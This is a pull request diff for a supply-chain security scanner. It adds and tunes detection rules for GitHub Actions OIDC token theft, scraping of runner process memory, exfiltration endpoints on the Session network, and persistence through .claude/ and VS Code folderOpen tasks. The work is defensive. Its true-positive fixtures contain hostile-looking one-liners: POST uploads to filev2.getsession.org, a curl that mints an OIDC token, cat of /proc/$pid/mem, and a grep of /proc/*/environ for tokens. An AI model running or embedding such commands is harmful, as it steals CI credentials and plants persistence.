### PR TITLE
feat(rules): SUPPLY_022 / 023 / 024 / 025 OIDC, runner pivot, session exfil, agent persistence

### DIFF
--- a/internal/rules/builtin/supply-chain-exfil.yaml
+++ b/internal/rules/builtin/supply-chain-exfil.yaml
@@ -259,3 +259,28 @@ examples:
   false_positive:
     - "/usr/local/lib/python3.12/site-packages"
     - "import _virtualenv"
+---
+id: SUPPLY_024
+name: "Session-Network exfil endpoint"
+description: "Detects references to the Session network endpoints used as exfil sinks in the Mini Shai-Hulud npm supply-chain incident. Legitimate packages do not contact these hosts."
+severity: HIGH
+category: supply-chain-exfil
+match_mode: any
+remediation: "Treat any reference to these endpoints as evidence of compromise. Audit the surrounding code and rotate any tokens the runner has held."
+patterns:
+  - type: contains
+    value: "filev2.getsession.org"
+  - type: contains
+    value: "seed1.getsession.org"
+  - type: contains
+    value: "seed2.getsession.org"
+  - type: contains
+    value: "seed3.getsession.org"
+examples:
+  true_positive:
+    - "fetch('https://filev2.getsession.org/upload', {method:'POST'})"
+    - "POST /upload to filev2.getsession.org"
+    - "bootstrap seed1.getsession.org"
+  false_positive:
+    - "session timeout: 30 minutes"
+    - "seed the random number generator"

--- a/internal/rules/builtin/supply-chain.yaml
+++ b/internal/rules/builtin/supply-chain.yaml
@@ -518,3 +518,82 @@ examples:
   false_positive:
     - "permissions: contents: read"
     - "permissions: issues: write"
+---
+id: SUPPLY_022
+name: "GitHub Actions OIDC token request variables in executable code"
+description: "Detects references to ACTIONS_ID_TOKEN_REQUEST_TOKEN or ACTIONS_ID_TOKEN_REQUEST_URL. These env vars are normally set by the runner only for the publish step; reading them from arbitrary install-time or build-time code lets a compromised dependency mint a trusted-publishing token."
+severity: HIGH
+category: supply-chain
+targets: ["*.js", "*.mjs", "*.cjs", "*.py", "*.sh", "*.yml", "*.yaml"]
+match_mode: any
+remediation: "Restrict OIDC token access to the publish job. Never read ACTIONS_ID_TOKEN_REQUEST_* from install-time or build-time scripts."
+patterns:
+  - type: contains
+    value: "ACTIONS_ID_TOKEN_REQUEST_TOKEN"
+  - type: contains
+    value: "ACTIONS_ID_TOKEN_REQUEST_URL"
+exclude_patterns:
+  - type: regex
+    value: "^\\s*(#|//)"
+examples:
+  true_positive:
+    - "const t = process.env.ACTIONS_ID_TOKEN_REQUEST_TOKEN;"
+    - "curl -H \"Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN\" $ACTIONS_ID_TOKEN_REQUEST_URL"
+    - "  - run: echo $ACTIONS_ID_TOKEN_REQUEST_URL"
+    - "token = os.environ['ACTIONS_ID_TOKEN_REQUEST_TOKEN']"
+  false_positive:
+    - "# ACTIONS_ID_TOKEN_REQUEST_TOKEN is provided by the runner"
+    - "// note: ACTIONS_ID_TOKEN_REQUEST_URL is set automatically"
+---
+id: SUPPLY_023
+name: "GitHub Actions runner process memory access"
+description: "Detects code that references /proc/, the Runner.Worker process name or ACTIONS_ID_TOKEN env, AND a memory-like subpath (/mem, /maps, cmdline). Reading another process's memory to steal an OIDC token is a runner-pivot shape with no legitimate use in normal package code."
+severity: CRITICAL
+category: supply-chain
+match_mode: all
+remediation: "Treat the file as malicious. Rotate any tokens reachable from the affected runner and audit recent CI runs for unexpected publishes."
+patterns:
+  - type: contains
+    value: "/proc/"
+  - type: regex
+    value: "Runner\\.Worker|ACTIONS_ID_TOKEN"
+  - type: regex
+    value: "/mem|/maps|cmdline"
+examples:
+  true_positive:
+    - "fs.readFileSync('/proc/'+pid+'/maps') if Runner.Worker found with ACTIONS_ID_TOKEN_REQUEST_TOKEN"
+    - "Walk /proc/ looking for Runner.Worker, then read /proc/<pid>/mem and extract ACTIONS_ID_TOKEN_REQUEST_URL"
+    - "open('/proc/self/cmdline') Runner.Worker ACTIONS_ID_TOKEN"
+  false_positive:
+    - "Read /proc/stat to compute CPU usage"
+    - "Standard worker pool. No proc access."
+---
+id: SUPPLY_025
+name: "Claude Code or VS Code workspace persistence path"
+description: "Detects references to Claude Code or VS Code workspace files that auto-execute on workspace open. A package writing to .claude/settings.json, .claude/router_runtime.js, .claude/setup.mjs, .claude/hooks/, or shipping a tasks.json with runOn:folderOpen installs persistence that survives reinstall and is invisible outside the specific editor."
+severity: HIGH
+category: supply-chain
+match_mode: any
+remediation: "Editor automation files belong to the user, not to package code. Audit the change in a clean clone, remove any package-emitted automation, and pin the source package to a known-clean version."
+patterns:
+  - type: contains
+    value: ".claude/settings.json"
+  - type: contains
+    value: ".claude/router_runtime.js"
+  - type: contains
+    value: ".claude/setup.mjs"
+  - type: contains
+    value: ".claude/hooks/"
+  - type: regex
+    value: "runOn[\"']?\\s*:\\s*[\"']folderOpen"
+examples:
+  true_positive:
+    - "fs.writeFileSync('.claude/settings.json', JSON.stringify(payload));"
+    - "require('fs').writeFileSync('.claude/router_runtime.js', code);"
+    - "cp .claude/setup.mjs $HOME/.claude/"
+    - "Hook installed at .claude/hooks/postinstall.sh"
+    - "{ \"runOn\": \"folderOpen\" }"
+    - "tasks: [{label:'init', runOn: 'folderOpen'}]"
+  false_positive:
+    - "no automation in this project"
+    - "Tasks can opt in with manual run options"

--- a/internal/rules/builtin/supply-chain.yaml
+++ b/internal/rules/builtin/supply-chain.yaml
@@ -545,14 +545,14 @@ examples:
 ---
 id: SUPPLY_023
 name: "GitHub Actions runner process memory access"
-description: "Detects code that reads /proc/<pid>/(mem|maps|cmdline) and references the Runner.Worker process name or an ACTIONS_ID_TOKEN env var. The path regex requires an explicit per-process segment, so benign root-level files like /proc/meminfo, /proc/cmdline, /proc/stat, and /proc/cpuinfo do not satisfy the rule. Reading another process's memory to steal an OIDC token is a runner-pivot shape with no legitimate use in normal package code."
+description: "Detects code that reads /proc/<pid>/(mem|maps|cmdline|environ) and references the Runner.Worker process name or an ACTIONS_ID_TOKEN env var. The path regex requires an explicit per-process segment, so benign root-level files like /proc/meminfo, /proc/cmdline, /proc/stat, and /proc/cpuinfo do not satisfy the rule. Reading another process's memory or environment to steal an OIDC token is a runner-pivot shape with no legitimate use in normal package code."
 severity: CRITICAL
 category: supply-chain
 match_mode: all
 remediation: "Treat the file as malicious. Rotate any tokens reachable from the affected runner and audit recent CI runs for unexpected publishes."
 patterns:
   - type: regex
-    value: "/proc/(self|thread-self|[0-9]+|\\$\\{[^}]+\\}|\\$[A-Za-z_][A-Za-z0-9_]*)/(mem|maps|cmdline)"
+    value: "/proc/(self|thread-self|[0-9]+|\\$\\{[^}]+\\}|\\$[A-Za-z_][A-Za-z0-9_]*)/(mem|maps|cmdline|environ)"
   - type: regex
     value: "Runner\\.Worker|ACTIONS_ID_TOKEN"
 examples:
@@ -561,6 +561,7 @@ examples:
     - "Walk /proc/12345/mem and extract ACTIONS_ID_TOKEN_REQUEST_URL"
     - "open('/proc/self/cmdline') Runner.Worker"
     - "for pid in $(pgrep Runner.Worker); do cat /proc/$pid/mem; done # ACTIONS_ID_TOKEN"
+    - "Dump /proc/$pid/environ for the Runner.Worker process to read ACTIONS_ID_TOKEN_REQUEST_TOKEN"
   false_positive:
     - "Read /proc/stat to compute CPU usage; ACTIONS_ID_TOKEN_REQUEST_TOKEN is unrelated"
     - "Parse /proc/meminfo for memory totals; Runner.Worker is the goroutine name"

--- a/internal/rules/builtin/supply-chain.yaml
+++ b/internal/rules/builtin/supply-chain.yaml
@@ -585,12 +585,22 @@ patterns:
     value: ".claude/setup.mjs"
   - type: contains
     value: ".claude/hooks/"
+  # Path-join construction: `path.join('.claude', 'hooks', ...)`,
+  # `filepath.Join(".claude", "settings.json")`, etc. The
+  # in-between separator covers the quote/comma/space sequence
+  # path APIs emit; the trailing segment limits matches to the
+  # known persistence files.
+  - type: regex
+    value: "['\"]\\.?claude['\"][\\s,]+['\"](settings\\.json|hooks|router_runtime\\.js|setup\\.mjs)"
 examples:
   true_positive:
     - "fs.writeFileSync('.claude/settings.json', JSON.stringify(payload));"
     - "require('fs').writeFileSync('.claude/router_runtime.js', code);"
     - "cp .claude/setup.mjs $HOME/.claude/"
     - "Hook installed at .claude/hooks/postinstall.sh"
+    - "path.join('.claude', 'hooks', 'postinstall.sh')"
+    - "filepath.Join(\".claude\", \"settings.json\")"
+    - "os.path.join('.claude', 'router_runtime.js')"
   false_positive:
     - "{ \"runOn\": \"folderOpen\" } # VS Code schema example, unrelated"
     - "Tasks list with run options"

--- a/internal/rules/builtin/supply-chain.yaml
+++ b/internal/rules/builtin/supply-chain.yaml
@@ -552,7 +552,7 @@ match_mode: all
 remediation: "Treat the file as malicious. Rotate any tokens reachable from the affected runner and audit recent CI runs for unexpected publishes."
 patterns:
   - type: regex
-    value: "/proc/[^/\\s]+/(mem|maps|cmdline|environ)"
+    value: "/proc/[^/]{1,80}/(mem|maps|cmdline|environ)"
   - type: regex
     value: "Runner\\.Worker|ACTIONS_ID_TOKEN"
 examples:
@@ -563,6 +563,7 @@ examples:
     - "for pid in $(pgrep Runner.Worker); do cat /proc/$pid/mem; done # ACTIONS_ID_TOKEN"
     - "Dump /proc/$pid/environ for the Runner.Worker process to read ACTIONS_ID_TOKEN_REQUEST_TOKEN"
     - "grep ACTIONS_ID_TOKEN_REQUEST_TOKEN /proc/*/environ # walks all runner PIDs"
+    - "open('/proc/' + str(pid) + '/environ') Runner.Worker"
   false_positive:
     - "Read /proc/stat to compute CPU usage; ACTIONS_ID_TOKEN_REQUEST_TOKEN is unrelated"
     - "Parse /proc/meminfo for memory totals; Runner.Worker is the goroutine name"
@@ -589,13 +590,15 @@ patterns:
   # variants; it rejects `.claude/hookspad` and similar typos.
   - type: regex
     value: "\\.claude/hooks\\b"
-  # Path-join construction: `path.join('.claude', 'hooks', ...)`,
-  # `filepath.Join(".claude", "settings.json")`, etc. The
-  # in-between separator covers the quote/comma/space sequence
-  # path APIs emit; the trailing segment limits matches to the
-  # known persistence files.
+  # Path-join and string-concat construction. Covers
+  # `path.join('.claude', 'hooks', ...)`,
+  # `filepath.Join(".claude", "settings.json")` (path APIs use
+  # comma separators), and `'.claude' + '/settings.json'` (string
+  # concat uses `+` and may carry a leading slash on the second
+  # literal). The trailing segment limits matches to the known
+  # persistence files.
   - type: regex
-    value: "['\"]\\.?claude['\"][\\s,]+['\"](settings\\.json|hooks|router_runtime\\.js|setup\\.mjs)"
+    value: "['\"]\\.?claude['\"][\\s,+]+['\"]/?(settings\\.json|hooks|router_runtime\\.js|setup\\.mjs)"
 examples:
   true_positive:
     - "fs.writeFileSync('.claude/settings.json', JSON.stringify(payload));"
@@ -606,6 +609,7 @@ examples:
     - "path.join('.claude', 'hooks', 'postinstall.sh')"
     - "filepath.Join(\".claude\", \"settings.json\")"
     - "os.path.join('.claude', 'router_runtime.js')"
+    - "const cfg = '.claude' + '/settings.json';"
   false_positive:
     - "{ \"runOn\": \"folderOpen\" } # VS Code schema example, unrelated"
     - "Tasks list with run options"

--- a/internal/rules/builtin/supply-chain.yaml
+++ b/internal/rules/builtin/supply-chain.yaml
@@ -521,10 +521,10 @@ examples:
 ---
 id: SUPPLY_022
 name: "GitHub Actions OIDC token request variables in executable code"
-description: "Detects references to ACTIONS_ID_TOKEN_REQUEST_TOKEN or ACTIONS_ID_TOKEN_REQUEST_URL. These env vars are normally set by the runner only for the publish step; reading them from arbitrary install-time or build-time code lets a compromised dependency mint a trusted-publishing token. Targets cover common executable file types plus extensionless lifecycle script basenames (install, postinstall, preinstall, prepare, prepublish); documentation extensions (.md, .rst, .txt) are intentionally out of scope to avoid HIGH findings on trusted-publishing prose."
+description: "Detects references to ACTIONS_ID_TOKEN_REQUEST_TOKEN or ACTIONS_ID_TOKEN_REQUEST_URL in package code. These env vars are normally set by the runner only for the publish step; reading them from arbitrary install-time or build-time code lets a compromised dependency mint a trusted-publishing token. Workflow YAML is intentionally out of scope here because the ci-trust analyzer (GHA_OIDC_001) already gates id-token: write on the chain shape; flagging every legitimate trusted-publishing workflow would block CI on its intended use. Targets cover common executable file types plus extensionless lifecycle script basenames (install, postinstall, preinstall, prepare, prepublish)."
 severity: HIGH
 category: supply-chain
-targets: ["*.js", "*.mjs", "*.cjs", "*.ts", "*.tsx", "*.py", "*.sh", "*.bash", "*.zsh", "*.rb", "*.pl", "*.go", "*.rs", "*.yml", "*.yaml", "package.json", "install", "postinstall", "preinstall", "prepare", "prepublish"]
+targets: ["*.js", "*.mjs", "*.cjs", "*.ts", "*.tsx", "*.py", "*.sh", "*.bash", "*.zsh", "*.rb", "*.pl", "*.go", "*.rs", "package.json", "install", "postinstall", "preinstall", "prepare", "prepublish"]
 match_mode: any
 remediation: "Restrict OIDC token access to the publish job. Never read ACTIONS_ID_TOKEN_REQUEST_* from install-time or build-time scripts."
 patterns:
@@ -536,7 +536,6 @@ examples:
   true_positive:
     - "const t = process.env.ACTIONS_ID_TOKEN_REQUEST_TOKEN;"
     - "curl -H \"Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN\" $ACTIONS_ID_TOKEN_REQUEST_URL"
-    - "  - run: echo $ACTIONS_ID_TOKEN_REQUEST_URL"
     - "token = os.environ['ACTIONS_ID_TOKEN_REQUEST_TOKEN']"
     - "\"postinstall\": \"node -e 'console.log(process.env.ACTIONS_ID_TOKEN_REQUEST_TOKEN)'\""
   false_positive:
@@ -571,9 +570,10 @@ examples:
 ---
 id: SUPPLY_025
 name: "Claude Code workspace persistence path"
-description: "Detects references to Claude Code workspace files that auto-execute on workspace open: settings.json hooks, router_runtime.js, setup.mjs, and the .claude/hooks/ directory. A package writing to any of these installs persistence that survives reinstall and is invisible outside the editor. VS Code persistence is handled by the jsrisk chain analyzer, which precisely gates on the tasks.json + runOn:folderOpen pair — a standalone runOn:folderOpen token is intentionally not flagged by this leaf-level rule because it appears in unrelated VS Code schemas and extension defaults."
+description: "Detects references to Claude Code workspace files that auto-execute on workspace open: settings.json hooks, router_runtime.js, setup.mjs, and the .claude/hooks/ directory. A package writing to any of these installs persistence that survives reinstall and is invisible outside the editor. Targets are scoped to executable file types and extensionless lifecycle scripts so a README or runbook describing the .claude/ surface is not treated as a finding. VS Code persistence is handled by the jsrisk chain analyzer, which precisely gates on the tasks.json + runOn:folderOpen pair."
 severity: HIGH
 category: supply-chain
+targets: ["*.js", "*.mjs", "*.cjs", "*.ts", "*.tsx", "*.py", "*.sh", "*.bash", "*.zsh", "*.rb", "*.pl", "*.go", "*.rs", "package.json", "install", "postinstall", "preinstall", "prepare", "prepublish"]
 match_mode: any
 remediation: "Editor automation files belong to the user, not to package code. Audit the change in a clean clone, remove any package-emitted automation, and pin the source package to a known-clean version."
 patterns:

--- a/internal/rules/builtin/supply-chain.yaml
+++ b/internal/rules/builtin/supply-chain.yaml
@@ -524,7 +524,7 @@ name: "GitHub Actions OIDC token request variables in executable code"
 description: "Detects references to ACTIONS_ID_TOKEN_REQUEST_TOKEN or ACTIONS_ID_TOKEN_REQUEST_URL in package code. These env vars are normally set by the runner only for the publish step; reading them from arbitrary install-time or build-time code lets a compromised dependency mint a trusted-publishing token. Workflow YAML is intentionally out of scope here because the ci-trust analyzer (GHA_OIDC_001) already gates id-token: write on the chain shape; flagging every legitimate trusted-publishing workflow would block CI on its intended use. Targets cover common executable file types plus extensionless lifecycle script basenames (install, postinstall, preinstall, prepare, prepublish)."
 severity: HIGH
 category: supply-chain
-targets: ["*.js", "*.mjs", "*.cjs", "*.ts", "*.tsx", "*.py", "*.sh", "*.bash", "*.zsh", "*.rb", "*.pl", "*.go", "*.rs", "package.json", "install", "postinstall", "preinstall", "prepare", "prepublish"]
+targets: ["*.js", "*.mjs", "*.cjs", "*.ts", "*.tsx", "*.py", "*.sh", "*.bash", "*.zsh", "*.rb", "*.pl", "*.go", "*.rs", "package.json", "install", "postinstall", "preinstall", "prepare", "prepublish", "action.yml", "action.yaml"]
 match_mode: any
 remediation: "Restrict OIDC token access to the publish job. Never read ACTIONS_ID_TOKEN_REQUEST_* from install-time or build-time scripts."
 patterns:

--- a/internal/rules/builtin/supply-chain.yaml
+++ b/internal/rules/builtin/supply-chain.yaml
@@ -521,9 +521,10 @@ examples:
 ---
 id: SUPPLY_022
 name: "GitHub Actions OIDC token request variables in executable code"
-description: "Detects references to ACTIONS_ID_TOKEN_REQUEST_TOKEN or ACTIONS_ID_TOKEN_REQUEST_URL. These env vars are normally set by the runner only for the publish step; reading them from arbitrary install-time or build-time code lets a compromised dependency mint a trusted-publishing token. No target filter so extensionless lifecycle scripts (./install, scripts/build, bin/postinstall) are scanned alongside the usual JS/TS/Python/shell/YAML/JSON forms."
+description: "Detects references to ACTIONS_ID_TOKEN_REQUEST_TOKEN or ACTIONS_ID_TOKEN_REQUEST_URL. These env vars are normally set by the runner only for the publish step; reading them from arbitrary install-time or build-time code lets a compromised dependency mint a trusted-publishing token. Targets cover common executable file types plus extensionless lifecycle script basenames (install, postinstall, preinstall, prepare, prepublish); documentation extensions (.md, .rst, .txt) are intentionally out of scope to avoid HIGH findings on trusted-publishing prose."
 severity: HIGH
 category: supply-chain
+targets: ["*.js", "*.mjs", "*.cjs", "*.ts", "*.tsx", "*.py", "*.sh", "*.bash", "*.zsh", "*.rb", "*.pl", "*.go", "*.rs", "*.yml", "*.yaml", "package.json", "install", "postinstall", "preinstall", "prepare", "prepublish"]
 match_mode: any
 remediation: "Restrict OIDC token access to the publish job. Never read ACTIONS_ID_TOKEN_REQUEST_* from install-time or build-time scripts."
 patterns:

--- a/internal/rules/builtin/supply-chain.yaml
+++ b/internal/rules/builtin/supply-chain.yaml
@@ -552,7 +552,7 @@ match_mode: all
 remediation: "Treat the file as malicious. Rotate any tokens reachable from the affected runner and audit recent CI runs for unexpected publishes."
 patterns:
   - type: regex
-    value: "/proc/(self|thread-self|[0-9]+|\\$\\{[^}]+\\})/(mem|maps|cmdline)"
+    value: "/proc/(self|thread-self|[0-9]+|\\$\\{[^}]+\\}|\\$[A-Za-z_][A-Za-z0-9_]*)/(mem|maps|cmdline)"
   - type: regex
     value: "Runner\\.Worker|ACTIONS_ID_TOKEN"
 examples:
@@ -560,6 +560,7 @@ examples:
     - "fs.readFileSync('/proc/self/maps') if Runner.Worker found with ACTIONS_ID_TOKEN_REQUEST_TOKEN"
     - "Walk /proc/12345/mem and extract ACTIONS_ID_TOKEN_REQUEST_URL"
     - "open('/proc/self/cmdline') Runner.Worker"
+    - "for pid in $(pgrep Runner.Worker); do cat /proc/$pid/mem; done # ACTIONS_ID_TOKEN"
   false_positive:
     - "Read /proc/stat to compute CPU usage; ACTIONS_ID_TOKEN_REQUEST_TOKEN is unrelated"
     - "Parse /proc/meminfo for memory totals; Runner.Worker is the goroutine name"

--- a/internal/rules/builtin/supply-chain.yaml
+++ b/internal/rules/builtin/supply-chain.yaml
@@ -544,9 +544,10 @@ examples:
 ---
 id: SUPPLY_023
 name: "GitHub Actions runner process memory access"
-description: "Detects code that reads /proc/<pid>/(mem|maps|cmdline|environ) and references the Runner.Worker process name or an ACTIONS_ID_TOKEN env var. The path regex requires an explicit per-process segment, so benign root-level files like /proc/meminfo, /proc/cmdline, /proc/stat, and /proc/cpuinfo do not satisfy the rule. Reading another process's memory or environment to steal an OIDC token is a runner-pivot shape with no legitimate use in normal package code."
+description: "Detects code that reads /proc/<pid>/(mem|maps|cmdline|environ) and references the Runner.Worker process name or an ACTIONS_ID_TOKEN env var. The path regex requires an explicit per-process segment, so benign root-level files like /proc/meminfo, /proc/cmdline, /proc/stat, and /proc/cpuinfo do not satisfy the rule. Targets are scoped to executable file types because match_mode: all evaluates file-wide; documentation/spec files (.md, .rst, .txt) that mention both signals in different sections are intentionally out of scope. Reading another process's memory or environment to steal an OIDC token is a runner-pivot shape with no legitimate use in normal package code."
 severity: CRITICAL
 category: supply-chain
+targets: ["*.js", "*.mjs", "*.cjs", "*.ts", "*.tsx", "*.py", "*.sh", "*.bash", "*.zsh", "*.rb", "*.pl", "*.go", "*.rs", "*.yml", "*.yaml", "package.json"]
 match_mode: all
 remediation: "Treat the file as malicious. Rotate any tokens reachable from the affected runner and audit recent CI runs for unexpected publishes."
 patterns:

--- a/internal/rules/builtin/supply-chain.yaml
+++ b/internal/rules/builtin/supply-chain.yaml
@@ -521,10 +521,9 @@ examples:
 ---
 id: SUPPLY_022
 name: "GitHub Actions OIDC token request variables in executable code"
-description: "Detects references to ACTIONS_ID_TOKEN_REQUEST_TOKEN or ACTIONS_ID_TOKEN_REQUEST_URL. These env vars are normally set by the runner only for the publish step; reading them from arbitrary install-time or build-time code lets a compromised dependency mint a trusted-publishing token. The targets include package.json so install-time npm scripts (preinstall, postinstall, prepare) are scanned."
+description: "Detects references to ACTIONS_ID_TOKEN_REQUEST_TOKEN or ACTIONS_ID_TOKEN_REQUEST_URL. These env vars are normally set by the runner only for the publish step; reading them from arbitrary install-time or build-time code lets a compromised dependency mint a trusted-publishing token. No target filter so extensionless lifecycle scripts (./install, scripts/build, bin/postinstall) are scanned alongside the usual JS/TS/Python/shell/YAML/JSON forms."
 severity: HIGH
 category: supply-chain
-targets: ["*.js", "*.mjs", "*.cjs", "*.ts", "*.tsx", "*.py", "*.sh", "*.yml", "*.yaml", "package.json"]
 match_mode: any
 remediation: "Restrict OIDC token access to the publish job. Never read ACTIONS_ID_TOKEN_REQUEST_* from install-time or build-time scripts."
 patterns:
@@ -552,7 +551,7 @@ match_mode: all
 remediation: "Treat the file as malicious. Rotate any tokens reachable from the affected runner and audit recent CI runs for unexpected publishes."
 patterns:
   - type: regex
-    value: "/proc/(self|thread-self|[0-9]+|\\$\\{[^}]+\\}|\\$[A-Za-z_][A-Za-z0-9_]*)/(mem|maps|cmdline|environ)"
+    value: "/proc/[^/\\s]+/(mem|maps|cmdline|environ)"
   - type: regex
     value: "Runner\\.Worker|ACTIONS_ID_TOKEN"
 examples:
@@ -562,6 +561,7 @@ examples:
     - "open('/proc/self/cmdline') Runner.Worker"
     - "for pid in $(pgrep Runner.Worker); do cat /proc/$pid/mem; done # ACTIONS_ID_TOKEN"
     - "Dump /proc/$pid/environ for the Runner.Worker process to read ACTIONS_ID_TOKEN_REQUEST_TOKEN"
+    - "grep ACTIONS_ID_TOKEN_REQUEST_TOKEN /proc/*/environ # walks all runner PIDs"
   false_positive:
     - "Read /proc/stat to compute CPU usage; ACTIONS_ID_TOKEN_REQUEST_TOKEN is unrelated"
     - "Parse /proc/meminfo for memory totals; Runner.Worker is the goroutine name"

--- a/internal/rules/builtin/supply-chain.yaml
+++ b/internal/rules/builtin/supply-chain.yaml
@@ -545,30 +545,29 @@ examples:
 ---
 id: SUPPLY_023
 name: "GitHub Actions runner process memory access"
-description: "Detects code that references /proc/, the Runner.Worker process name or ACTIONS_ID_TOKEN env, AND a memory-like subpath (/mem, /maps, cmdline). Reading another process's memory to steal an OIDC token is a runner-pivot shape with no legitimate use in normal package code."
+description: "Detects code that reads /proc/<pid>/(mem|maps|cmdline) and references the Runner.Worker process name or an ACTIONS_ID_TOKEN env var. The path regex requires an explicit per-process segment, so benign root-level files like /proc/meminfo, /proc/cmdline, /proc/stat, and /proc/cpuinfo do not satisfy the rule. Reading another process's memory to steal an OIDC token is a runner-pivot shape with no legitimate use in normal package code."
 severity: CRITICAL
 category: supply-chain
 match_mode: all
 remediation: "Treat the file as malicious. Rotate any tokens reachable from the affected runner and audit recent CI runs for unexpected publishes."
 patterns:
-  - type: contains
-    value: "/proc/"
+  - type: regex
+    value: "/proc/(self|thread-self|[0-9]+|\\$\\{[^}]+\\})/(mem|maps|cmdline)"
   - type: regex
     value: "Runner\\.Worker|ACTIONS_ID_TOKEN"
-  - type: regex
-    value: "/mem|/maps|cmdline"
 examples:
   true_positive:
-    - "fs.readFileSync('/proc/'+pid+'/maps') if Runner.Worker found with ACTIONS_ID_TOKEN_REQUEST_TOKEN"
-    - "Walk /proc/ looking for Runner.Worker, then read /proc/<pid>/mem and extract ACTIONS_ID_TOKEN_REQUEST_URL"
-    - "open('/proc/self/cmdline') Runner.Worker ACTIONS_ID_TOKEN"
+    - "fs.readFileSync('/proc/self/maps') if Runner.Worker found with ACTIONS_ID_TOKEN_REQUEST_TOKEN"
+    - "Walk /proc/12345/mem and extract ACTIONS_ID_TOKEN_REQUEST_URL"
+    - "open('/proc/self/cmdline') Runner.Worker"
   false_positive:
-    - "Read /proc/stat to compute CPU usage"
-    - "Standard worker pool. No proc access."
+    - "Read /proc/stat to compute CPU usage; ACTIONS_ID_TOKEN_REQUEST_TOKEN is unrelated"
+    - "Parse /proc/meminfo for memory totals; Runner.Worker is the goroutine name"
+    - "Inspect /proc/cmdline for boot args; mentions ACTIONS_ID_TOKEN"
 ---
 id: SUPPLY_025
-name: "Claude Code or VS Code workspace persistence path"
-description: "Detects references to Claude Code or VS Code workspace files that auto-execute on workspace open. A package writing to .claude/settings.json, .claude/router_runtime.js, .claude/setup.mjs, .claude/hooks/, or shipping a tasks.json with runOn:folderOpen installs persistence that survives reinstall and is invisible outside the specific editor."
+name: "Editor workspace auto-execution path"
+description: "Detects references to editor workspace files that auto-execute on workspace open: Claude Code's settings.json hooks, router_runtime.js, setup.mjs, and the .claude/hooks/ directory, plus the VS Code runOn:folderOpen task trigger that turns a tasks.json entry into an auto-run. Standalone .vscode/setup.mjs and .vscode/tasks.json references are not included because they do not auto-execute on their own; the chain analyzer (jsrisk) gates VS Code persistence on the tasks.json + folderOpen pair."
 severity: HIGH
 category: supply-chain
 match_mode: any
@@ -582,10 +581,6 @@ patterns:
     value: ".claude/setup.mjs"
   - type: contains
     value: ".claude/hooks/"
-  - type: contains
-    value: ".vscode/tasks.json"
-  - type: contains
-    value: ".vscode/setup.mjs"
   - type: regex
     value: "runOn[\"']?\\s*:\\s*[\"']folderOpen"
 examples:
@@ -594,10 +589,8 @@ examples:
     - "require('fs').writeFileSync('.claude/router_runtime.js', code);"
     - "cp .claude/setup.mjs $HOME/.claude/"
     - "Hook installed at .claude/hooks/postinstall.sh"
-    - "fs.writeFileSync('.vscode/tasks.json', JSON.stringify(tasks));"
-    - "Pre-populates .vscode/setup.mjs on install"
     - "{ \"runOn\": \"folderOpen\" }"
     - "tasks: [{label:'init', runOn: 'folderOpen'}]"
   false_positive:
-    - "no automation in this project"
-    - "Tasks can opt in with manual run options"
+    - "Manual tasks list with run options"
+    - "Ships an example .vscode/tasks.json template; users opt in manually"

--- a/internal/rules/builtin/supply-chain.yaml
+++ b/internal/rules/builtin/supply-chain.yaml
@@ -524,7 +524,7 @@ name: "GitHub Actions OIDC token request variables in executable code"
 description: "Detects references to ACTIONS_ID_TOKEN_REQUEST_TOKEN or ACTIONS_ID_TOKEN_REQUEST_URL. These env vars are normally set by the runner only for the publish step; reading them from arbitrary install-time or build-time code lets a compromised dependency mint a trusted-publishing token. The targets include package.json so install-time npm scripts (preinstall, postinstall, prepare) are scanned."
 severity: HIGH
 category: supply-chain
-targets: ["*.js", "*.mjs", "*.cjs", "*.py", "*.sh", "*.yml", "*.yaml", "package.json"]
+targets: ["*.js", "*.mjs", "*.cjs", "*.ts", "*.tsx", "*.py", "*.sh", "*.yml", "*.yaml", "package.json"]
 match_mode: any
 remediation: "Restrict OIDC token access to the publish job. Never read ACTIONS_ID_TOKEN_REQUEST_* from install-time or build-time scripts."
 patterns:
@@ -582,6 +582,10 @@ patterns:
     value: ".claude/setup.mjs"
   - type: contains
     value: ".claude/hooks/"
+  - type: contains
+    value: ".vscode/tasks.json"
+  - type: contains
+    value: ".vscode/setup.mjs"
   - type: regex
     value: "runOn[\"']?\\s*:\\s*[\"']folderOpen"
 examples:
@@ -590,6 +594,8 @@ examples:
     - "require('fs').writeFileSync('.claude/router_runtime.js', code);"
     - "cp .claude/setup.mjs $HOME/.claude/"
     - "Hook installed at .claude/hooks/postinstall.sh"
+    - "fs.writeFileSync('.vscode/tasks.json', JSON.stringify(tasks));"
+    - "Pre-populates .vscode/setup.mjs on install"
     - "{ \"runOn\": \"folderOpen\" }"
     - "tasks: [{label:'init', runOn: 'folderOpen'}]"
   false_positive:

--- a/internal/rules/builtin/supply-chain.yaml
+++ b/internal/rules/builtin/supply-chain.yaml
@@ -521,10 +521,10 @@ examples:
 ---
 id: SUPPLY_022
 name: "GitHub Actions OIDC token request variables in executable code"
-description: "Detects references to ACTIONS_ID_TOKEN_REQUEST_TOKEN or ACTIONS_ID_TOKEN_REQUEST_URL. These env vars are normally set by the runner only for the publish step; reading them from arbitrary install-time or build-time code lets a compromised dependency mint a trusted-publishing token."
+description: "Detects references to ACTIONS_ID_TOKEN_REQUEST_TOKEN or ACTIONS_ID_TOKEN_REQUEST_URL. These env vars are normally set by the runner only for the publish step; reading them from arbitrary install-time or build-time code lets a compromised dependency mint a trusted-publishing token. The targets include package.json so install-time npm scripts (preinstall, postinstall, prepare) are scanned."
 severity: HIGH
 category: supply-chain
-targets: ["*.js", "*.mjs", "*.cjs", "*.py", "*.sh", "*.yml", "*.yaml"]
+targets: ["*.js", "*.mjs", "*.cjs", "*.py", "*.sh", "*.yml", "*.yaml", "package.json"]
 match_mode: any
 remediation: "Restrict OIDC token access to the publish job. Never read ACTIONS_ID_TOKEN_REQUEST_* from install-time or build-time scripts."
 patterns:
@@ -532,18 +532,16 @@ patterns:
     value: "ACTIONS_ID_TOKEN_REQUEST_TOKEN"
   - type: contains
     value: "ACTIONS_ID_TOKEN_REQUEST_URL"
-exclude_patterns:
-  - type: regex
-    value: "^\\s*(#|//)"
 examples:
   true_positive:
     - "const t = process.env.ACTIONS_ID_TOKEN_REQUEST_TOKEN;"
     - "curl -H \"Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN\" $ACTIONS_ID_TOKEN_REQUEST_URL"
     - "  - run: echo $ACTIONS_ID_TOKEN_REQUEST_URL"
     - "token = os.environ['ACTIONS_ID_TOKEN_REQUEST_TOKEN']"
